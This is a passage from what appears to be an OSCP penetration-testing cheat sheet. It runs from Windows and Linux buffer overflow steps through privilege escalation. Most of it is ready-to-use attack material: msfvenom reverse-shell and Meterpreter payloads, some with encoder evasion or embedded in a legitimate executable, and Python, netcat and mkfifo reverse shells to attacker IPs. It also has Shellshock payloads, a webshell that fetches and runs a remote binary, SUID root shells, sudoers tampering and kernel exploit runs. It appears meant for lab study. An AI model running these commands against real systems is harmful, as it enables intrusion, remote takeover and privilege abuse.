  855.         nmap --script dns-fuzz --script-args timelimit=2h $ip -d
  856.  
  857. -   MSFvenom  
  858.     [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-unleashed/msfvenom/)
  859.  
  860. -   Windows Buffer Overflows
  861.  
  862.     -   Controlling EIP
  863.    
  864.              locate pattern_create
  865.              pattern_create.rb -l 2700
  866.              locate pattern_offset
  867.              pattern_offset.rb -q 39694438
  868.  
  869.     -   Verify exact location of EIP - [\*] Exact match at offset 2606
  870.  
  871.             buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
  872.  
  873.     -   Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
  874.  
  875.     -   Use Mona to determine a module that is unprotected
  876.  
  877.     -   Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
  878.  
  879.     -   Use NASM to determine the HEX code for a JMP ESP instruction
  880.  
  881.             /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
  882.  
  883.             JMP ESP  
  884.             00000000 FFE4 jmp esp
  885.  
  886.     -   Run Mona in immunity log window to find (FFE4) XEF command
  887.  
  888.             !mona find -s "\xff\xe4" -m slmfc.dll  
  889.             found at 0x5f4a358f - Flip around for little endian format
  890.             buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
  891.  
  892.     -   MSFVenom to create payload
  893.    
  894.             msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
  895.  
  896.     -   Final Payload with NOP slide  
  897.    
  898.             buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
  899.  
  900.     -   Create a PE Reverse Shell  
  901.         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
  902.         -f  
  903.         exe -o shell\_reverse.exe
  904.  
  905.     -   Create a PE Reverse Shell and Encode 9 times with
  906.         Shikata\_ga\_nai  
  907.         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
  908.         -f  
  909.         exe -e x86/shikata\_ga\_nai -i 9 -o
  910.         shell\_reverse\_msf\_encoded.exe
  911.  
  912.     -   Create a PE reverse shell and embed it into an existing
  913.         executable  
  914.         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
  915.         exe -e x86/shikata\_ga\_nai -i 9 -x
  916.         /usr/share/windows-binaries/plink.exe -o
  917.         shell\_reverse\_msf\_encoded\_embedded.exe
  918.  
  919.     -   Create a PE Reverse HTTPS shell  
  920.         msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
  921.         LPORT=443 -f exe -o met\_https\_reverse.exe
  922.  
  923. -   Linux Buffer Overflows
  924.  
  925.     -   Run Evans Debugger against an app  
  926.         edb --run /usr/games/crossfire/bin/crossfire
  927.  
  928.     -   ESP register points toward the end of our CBuffer  
  929.         add eax,12  
  930.         jmp eax  
  931.         83C00C add eax,byte +0xc  
  932.         FFE0 jmp eax
  933.  
  934.     -   Check for “Bad Characters” Process of elimination - Run multiple
  935.         times 0x00 - 0xFF
  936.  
  937.     -   Find JMP ESP address  
  938.         "\\x97\\x45\\x13\\x08" \# Found at Address 08134597
  939.  
  940.     -   crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
  941.         "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
  942.  
  943.     -   msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
  944.         "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
  945.  
  946.     -   Connect to the shell with netcat:  
  947.         nc -v $ip 4444
  948.        
  949. Shells
  950. ===================================================================================================================================
  951.  
  952. -   Netcat Shell Listener  
  953.  
  954.     `nc -nlvp 4444`
  955.  
  956. -   Spawning a TTY Shell - Break out of Jail or limited shell
  957.          You should almost always upgrade your shell after taking control of an apache or www user.
  958.          
  959.         (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
  960.        
  961.         (hint: sudo -l to see what you can run)
  962.        
  963.      -   You may encounter limited shells that use rbash and only allow you to execute a single command per session.
  964.          You can overcome this by executing an SSH shell to your localhost:
  965.          
  966.                ssh user@$ip nc $localip 4444 -e /bin/sh
  967.                enter user's password
  968.                python -c 'import pty; pty.spawn("/bin/sh")'
  969.                export TERM=linux
  970.          
  971.       `python -c 'import pty; pty.spawn("/bin/sh")'`
  972.  
  973.                python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);          s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
  974.  
  975.       `echo os.system('/bin/bash')`
  976.  
  977.       `/bin/sh -i`
  978.  
  979.       `perl —e 'exec "/bin/sh";'`
  980.  
  981.       perl: `exec "/bin/sh";`
  982.  
  983.       ruby: `exec "/bin/sh"`
  984.  
  985.       lua: `os.execute('/bin/sh')`
  986.  
  987.       From within IRB: `exec "/bin/sh"`
  988.  
  989.  
  990.       From within vi: `:!bash`
  991.      or
  992.      
  993.       `:set shell=/bin/bash:shell`
  994.      
  995.       From within vim `':!bash':`
  996.  
  997.       From within nmap: `!sh`
  998.  
  999.       From within tcpdump
  1000.      
  1001.          echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
  1002.  
  1003.       From busybox  `/bin/busybox telnetd -|/bin/sh -p9999`
  1004.  
  1005. -   Pen test monkey PHP reverse shell  
  1006.     [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
  1007.  
  1008. -   php-findsock-shell - turns PHP port 80 into an interactive shell  
  1009.     [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://pentestmonkey.net/tools/web-shells/php-findsock-shell)
  1010.  
  1011. -   Perl Reverse Shell  
  1012.     [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
  1013.  
  1014. -   PHP powered web browser Shell b374k with file upload etc.  
  1015.     [https://github.com/b374k/b374k](https://github.com/b374k/b374k)
  1016.  
  1017. -   Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
  1018.     https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
  1019.    
  1020. -   Web Backdoors from Fuzzdb
  1021.     https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
  1022.  
  1023. -   Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
  1024.      
  1025.       *Linux*
  1026.      
  1027.       `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
  1028.      
  1029.       *Windows*
  1030.      
  1031.       `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
  1032.      
  1033.       *Mac*
  1034.  
  1035.       `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
  1036.      
  1037.       **Web Payloads**
  1038.      
  1039.       *PHP*
  1040.      
  1041.       `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
  1042.      
  1043.       OR
  1044.      
  1045.       `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
  1046.      
  1047.       Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
  1048.      
  1049.       `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
  1050.      
  1051.       *ASP*
  1052.  
  1053.       `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`
  1054.      
  1055.       *JSP*
  1056.  
  1057.       `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`
  1058.      
  1059.       *WAR*
  1060.  
  1061.       `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
  1062.      
  1063.       **Scripting Payloads**
  1064.      
  1065.       *Python*
  1066.  
  1067.       `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`
  1068.      
  1069.       *Bash*
  1070.  
  1071.       `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
  1072.      
  1073.       *Perl*
  1074.  
  1075.       `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`
  1076.      
  1077.       **Shellcode**
  1078.      
  1079.       For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
  1080.  
  1081.       *Linux Based Shellcode*
  1082.  
  1083.       `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
  1084.      
  1085.       *Windows Based Shellcode*
  1086.  
  1087.       `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
  1088.      
  1089.       *Mac Based Shellcode*
  1090.  
  1091.       `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
  1092.  
  1093.       **Handlers**
  1094.       Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
  1095.  
  1096.          use exploit/multi/handler
  1097.          set PAYLOAD <Payload name>
  1098.          set LHOST <LHOST value>
  1099.          set LPORT <LPORT value>
  1100.          set ExitOnSession false
  1101.          exploit -j -z
  1102.      
  1103.       Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
  1104.  
  1105. -   SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
  1106.  
  1107.          use auxiliary/scanner/ssh/ssh_login
  1108.          use post/multi/manage/shell_to_meterpreter
  1109.  
  1110. -   Shellshock
  1111.  
  1112.     -   Testing for shell shock with NMap
  1113.    
  1114.     `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip`
  1115.  
  1116.     -   git clone https://github.com/nccgroup/shocker
  1117.  
  1118.     `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
  1119.  
  1120.     -   Shell Shock SSH Forced Command  
  1121.         Check for forced command by enabling all debug output with ssh  
  1122.        
  1123.               ssh -vvv  
  1124.               ssh -i noob noob@$ip '() { :;}; /bin/bash'
  1125.  
  1126.     -   cat file (view file contents)  
  1127.    
  1128.               echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
  1129.  
  1130.     -   Shell Shock run bind shell  
  1131.    
  1132.              echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
  1133.  
  1134. File Transfers
  1135. ============================================================================================================
  1136.  
  1137. -   Post exploitation refers to the actions performed by an attacker,
  1138.     once some level of control has been gained on his target.
  1139.  
  1140. -   Simple Local Web Servers
  1141.  
  1142.     -   Run a basic http server, great for serving up shells etc  
  1143.         python -m SimpleHTTPServer 80
  1144.  
  1145.     -   Run a basic Python3 http server, great for serving up shells
  1146.         etc  
  1147.         python3 -m http.server
  1148.  
  1149.     -   Run a ruby webrick basic http server  
  1150.         ruby -rwebrick -e "WEBrick::HTTPServer.new  
  1151.         (:Port => 80, :DocumentRoot => Dir.pwd).start"
  1152.  
  1153.     -   Run a basic PHP http server  
  1154.         php -S $ip:80
  1155.  
  1156. -   Creating a wget VB Script on Windows:  
  1157.     [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
  1158.  
  1159. -   Windows file transfer script that can be pasted to the command line.  File transfers to a Windows machine can be tricky without a Meterpreter shell.  The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
  1160.  
  1161.          echo Set args = Wscript.Arguments  >> webdl.vbs
  1162.          timeout 1
  1163.          echo Url = "http://1.1.1.1/windows-privesc-check2.exe"  >> webdl.vbs
  1164.          timeout 1
  1165.          echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")  >> webdl.vbs
  1166.          timeout 1
  1167.          echo dim bStrm: Set bStrm = createobject("Adodb.Stream")  >> webdl.vbs
  1168.          timeout 1
  1169.          echo xHttp.Open "GET", Url, False  >> webdl.vbs
  1170.          timeout 1
  1171.          echo xHttp.Send  >> webdl.vbs
  1172.          timeout 1
  1173.          echo with bStrm      >> webdl.vbs
  1174.          timeout 1
  1175.          echo   .type = 1 '      >> webdl.vbs
  1176.          timeout 1
  1177.          echo   .open      >> webdl.vbs
  1178.          timeout 1
  1179.          echo   .write xHttp.responseBody      >> webdl.vbs
  1180.          timeout 1
  1181.          echo   .savetofile "C:\temp\windows-privesc-check2.exe", 2 '  >> webdl.vbs
  1182.          timeout 1
  1183.          echo end with >> webdl.vbs
  1184.          timeout 1
  1185.          echo
  1186.  
  1187.       The file can be run using the following syntax:
  1188.      
  1189.       `C:\temp\cscript.exe webdl.vbs`
  1190.      
  1191. -   Mounting File Shares
  1192.  
  1193.     -   Mount NFS share to /mnt/nfs  
  1194.         mount $ip:/vol/share /mnt/nfs
  1195.  
  1196. -   HTTP Put  
  1197.     nmap -p80 $ip --script http-put --script-args
  1198.     http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
  1199.  
  1200. -   Uploading Files
  1201.     -------------------------------------------------------------------------------------------------------------
  1202.  
  1203.     -   SCP
  1204.    
  1205.         scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
  1206.        
  1207.         scp localfile username@$ip:~/Folder/
  1208.        
  1209.         scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~
  1210.        
  1211.  
  1212.     -   Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
  1213.    
  1214.         `davtest -move -sendbd auto -url http://$ip`
  1215.      
  1216.         https://github.com/cldrn/davtest
  1217.        
  1218.         You can also upload a file using the PUT method with the curl command:
  1219.        
  1220.         `curl -T 'leetshellz.txt' 'http://$ip'`
  1221.        
  1222.         And rename it to an executable file using the MOVE method with the curl command:
  1223.  
  1224.         `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
  1225.  
  1226.     -   Upload shell using limited php shell cmd  
  1227.         use the webshell to download and execute the meterpreter  
  1228.         \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
  1229.         /tmp/evil" http://$ip/files/sh.php  
  1230.         \[curl -s --data "cmd=chmod 777 /tmp/evil"
  1231.         http://$ip/files/sh.php  
  1232.         curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
  1233.  
  1234.     -   TFTP  
  1235.         mkdir /tftp  
  1236.         atftpd --daemon --port 69 /tftp  
  1237.         cp /usr/share/windows-binaries/nc.exe /tftp/  
  1238.         EX. FROM WINDOWS HOST:  
  1239.         C:\\Users\\Offsec>tftp -i $ip get nc.exe
  1240.  
  1241.     -   FTP  
  1242.         apt-get update && apt-get install pure-ftpd  
  1243.          
  1244.         \#!/bin/bash  
  1245.         groupadd ftpgroup  
  1246.         useradd -g ftpgroup -d /dev/null -s /etc ftpuser  
  1247.         pure-pw useradd offsec -u ftpuser -d /ftphome  
  1248.         pure-pw mkdb  
  1249.         cd /etc/pure-ftpd/auth/  
  1250.         ln -s ../conf/PureDB 60pdb  
  1251.         mkdir -p /ftphome  
  1252.         chown -R ftpuser:ftpgroup /ftphome/  
  1253.          
  1254.         /etc/init.d/pure-ftpd restart
  1255.  
  1256. -   Packing Files
  1257.     -------------------------------------------------------------------------------------------------------------
  1258.  
  1259.     -   Ultimate Packer for eXecutables  
  1260.         upx -9 nc.exe
  1261.  
  1262.     -   exe2bat - Converts EXE to a text file that can be copied and
  1263.         pasted  
  1264.         locate exe2bat  
  1265.         wine exe2bat.exe nc.exe nc.txt
  1266.  
  1267.     -   Veil - Evasion Framework -
  1268.         https://github.com/Veil-Framework/Veil-Evasion  
  1269.         apt-get -y install git  
  1270.         git clone https://github.com/Veil-Framework/Veil-Evasion.git  
  1271.         cd Veil-Evasion/  
  1272.         cd setup  
  1273.         setup.sh -c
  1274.  
  1275. Privilege Escalation
  1276. ==================================================================================================================
  1277.  
  1278. *Password reuse is your friend.  The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
  1279.  
  1280.  
  1281. -   Linux Privilege Escalation
  1282.     ------------------------------------------------------------------------------------------------------------------------
  1283.  
  1284. -   Defacto Linux Privilege Escalation Guide  - A much more through guide for linux enumeration:
  1285.     [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
  1286.  
  1287. -   Try the obvious - Maybe the user can sudo to root:  
  1288.    
  1289.     `sudo su`
  1290.    
  1291. -   Here are the commands I have learned to use to perform linux enumeration and privledge escalation:
  1292.  
  1293.     What services are running as root?:
  1294.    
  1295.     `ps aux | grep root`
  1296.    
  1297.     What files run as root / SUID / GUID?:
  1298.  
  1299.          find / -perm +2000 -user root -type f -print
  1300.          find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
  1301.          find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
  1302.          find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
  1303.          find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
  1304.          for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done  
  1305.          find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
  1306.  
  1307.     What folders are world writeable?:
  1308.    
  1309.          find / -writable -type d 2>/dev/null      # world-writeable folders
  1310.          find / -perm -222 -type d 2>/dev/null     # world-writeable folders
  1311.          find / -perm -o w -type d 2>/dev/null     # world-writeable folders
  1312.          find / -perm -o x -type d 2>/dev/null     # world-executable folders
  1313.          find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders
  1314.    
  1315. -   There are a few scripts that can automate the linux enumeration process:
  1316.  
  1317.       - Google is my favorite Linux Kernel exploitation search tool.  Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.
  1318.  
  1319.       - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -
  1320.      
  1321.          [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)
  1322.  
  1323.       - LinEnum - (Recently Updated)
  1324.      
  1325.       [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)
  1326.      
  1327.       - linux-exploit-suggester (Recently Updated)
  1328.      
  1329.       [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
  1330.      
  1331.       -   Highon.coffee Linux Local Enum - Great enumeration script!
  1332.      
  1333.           `wget https://highon.coffee/downloads/linux-local-enum.sh`
  1334.  
  1335.       -   Linux Privilege Exploit Suggester  (Old has not been updated in years)
  1336.      
  1337.     [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
  1338.  
  1339.       -   Linux post exploitation enumeration and exploit checking tools  
  1340.      
  1341.     [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
  1342.    
  1343.  
  1344. Handy Kernel Exploits
  1345.  
  1346. -   CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
  1347.  
  1348.     [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)
  1349.    
  1350.          wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
  1351.          $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
  1352.          $ ./i-can-haz-modharden
  1353.          [+] launching root shell!
  1354.          # id
  1355.          uid=0(root) gid=0(root)
  1356.  
  1357. -   CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8  
  1358.     [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
  1359.  
  1360. -   CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)  
  1361.     [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)  
  1362.     Linux CVE 2012-0056  
  1363.    
  1364.           wget -O exploit.c http://www.exploit-db.com/download/18411
  1365.           gcc -o mempodipper exploit.c  
  1366.           ./mempodipper
  1367.  
  1368. -   CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8  
  1369.     [https://dirtycow.ninja/](https://dirtycow.ninja/)  
  1370.     First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016  
  1371.  
  1372. -   Run a command as a user other than root  
  1373.  
  1374.           sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
  1375.  
  1376. -   Add a user or change a password
  1377.  
  1378.           /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor  
  1379.           echo thePassword | passwd haxzor --stdin
  1380.  
  1381. -   Local Privilege Escalation Exploit in Linux
  1382.  
  1383.     -   **SUID** (**S**et owner **U**ser **ID** up on execution)  
  1384.         Often SUID C binary files are required to spawn a shell as a
  1385.         superuser, you can update the UID / GID and shell as required.  
  1386.          
  1387.         below are some quick copy and paste examples for various
  1388.         shells:  
  1389.      
  1390.               SUID C Shell for /bin/bash  
  1391.  
  1392.               int main(void){  
  1393.               setresuid(0, 0, 0);  
  1394.               system("/bin/bash");  
  1395.               }  
  1396.  
  1397.               SUID C Shell for /bin/sh  
  1398.  
  1399.               int main(void){  
  1400.               setresuid(0, 0, 0);  
  1401.               system("/bin/sh");  
  1402.               }  
  1403.  
  1404.               Building the SUID Shell binary  
  1405.               gcc -o suid suid.c  
  1406.               For 32 bit:  
  1407.               gcc -m32 -o suid suid.c
  1408.  
  1409.     -   Create and compile an SUID from a limited shell (no file transfer)  
  1410.        
  1411.               echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c  
  1412.               gcc privsc.c -o privsc
  1413.  
  1414. -   Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
  1415.  
  1416.     `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
  1417.    
  1418. -   You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
  1419.     to execute your command instead.  In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
  1420.     port 4444.
  1421.    
  1422.          set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
  1423.          echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
  1424.          chmod +x ssh
  1425.  
  1426. -   SearchSploit  
  1427.  
  1428.               searchsploit –uncsearchsploit apache 2.2  
  1429.               searchsploit "Linux Kernel"  
  1430.               searchsploit linux 2.6 | grep -i ubuntu | grep local  
  1431.               searchsploit slmail
  1432.  
  1433.  -   Kernel Exploit Suggestions for Kernel Version 3.0.0  
  1434.  
  1435.      `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`
  1436.  
  1437. -   Precompiled Linux Kernel Exploits  - ***Super handy if GCC is not installed on the target machine!***
  1438.  
  1439.     [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)    
  1440.  
  1441. -   Collect root password
  1442.  
  1443.     `cat /etc/shadow |grep root`
  1444.    
  1445. -   Find and display the proof.txt or flag.txt - LOOT!
  1446.  
  1447.             cat `find / -name proof.txt -print`
  1448.  
  1449. -   Windows Privilege Escalation
  1450.     --------------------------------------------------------------------------------------------------------------------------
  1451.  
  1452. -   Windows Privilege Escalation resource
  1453.     http://www.fuzzysecurity.com/tutorials/16.html
  1454.  
  1455. -   Try the getsystem command using meterpreter - rarely works but is worth a try.
  1456.  
  1457.     `meterpreter > getsystem`
  1458.  
  1459. -   Metasploit Meterpreter Privilege Escalation Guide
  1460.     https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
  1461.  
  1462. -   Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
  1463. http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
  1464.  
  1465.          msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
  1466.  
  1467.          cadavar http://$ip
  1468.          dav:/> put aspshell.txt
  1469.          Uploading aspshell.txt to `/aspshell.txt':
  1470.          Progress: [=============================>] 100.0% of 38468 bytes succeeded.
  1471.          dav:/> copy aspshell.txt aspshell3.asp;.txt
  1472.          Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt':  succeeded.
  1473.          dav:/> exit
  1474.  
  1475.          msf > use exploit/multi/handler
  1476.          msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  1477.          msf exploit(handler) > set LHOST 1.2.3.4
  1478.          msf exploit(handler) > set LPORT 80
  1479.          msf exploit(handler) > set ExitOnSession false
  1480.          msf exploit(handler) > exploit -j
  1481.  
  1482.          curl http://$ip/aspshell3.asp;.txt
  1483.  
  1484.          [*] Started reverse TCP handler on 1.2.3.4:443
  1485.          [*] Starting the payload handler...
  1486.          [*] Sending stage (957487 bytes) to 1.2.3.5
  1487.          [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
  1488.  
  1489. -   Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
  1490.  
  1491.          pip install pyinstaller
  1492.          wget -O exploit.py http://www.exploit-db.com/download/31853  
  1493.          python pyinstaller.py --onefile exploit.py
  1494.  
  1495. -   Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
  1496.  
  1497.       https://www.exploit-db.com/exploits/6705/
  1498.    
  1499.       https://github.com/Re4son/Churrasco
  1500.      
  1501.          c:\Inetpub>churrasco
  1502.          churrasco
  1503.          /churrasco/-->Usage: Churrasco.exe [-d] "command to run"
  1504.  
  1505.          c:\Inetpub>churrasco -d "net user /add <username> <password>"
  1506.          c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
  1507.          c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
  1508.  
  1509. -   Windows MS11-080 - http://www.exploit-db.com/exploits/18176/  
  1510.    
  1511.           python pyinstaller.py --onefile ms11-080.py  
  1512.           mx11-080.exe -O XP
  1513.    
  1514. -   Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt.  Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
  1515.  
  1516.       MS16-032 https://www.exploit-db.com/exploits/39719/
  1517.      
  1518.       `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"`
  1519.      
  1520.    
  1521. -   Powershell Priv Escalation Tools
  1522.     https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
  1523.  
  1524. -   Windows Run As - Switching users in linux is trival with the `SU` command.  However, an equivalent command does not exist in Windows.  Here are 3 ways to run a command as a different user in Windows.
  1525.  
  1526.       -   Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
  1527.  
  1528.                C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
  1529.  
  1530.                PsExec v2.2 - Execute processes remotely
  1531.                Copyright (C) 2001-2016 Mark Russinovich
  1532.                Sysinternals - www.sysinternals.com
  1533.  
  1534.       -   Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
  1535.  
  1536.                C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
  1537.                Enter the password for Test:
  1538.                Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
  1539.  
  1540.       -   PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.
  1541.  
  1542.                $username = '<username here>'
  1543.                $password = '<password here>'
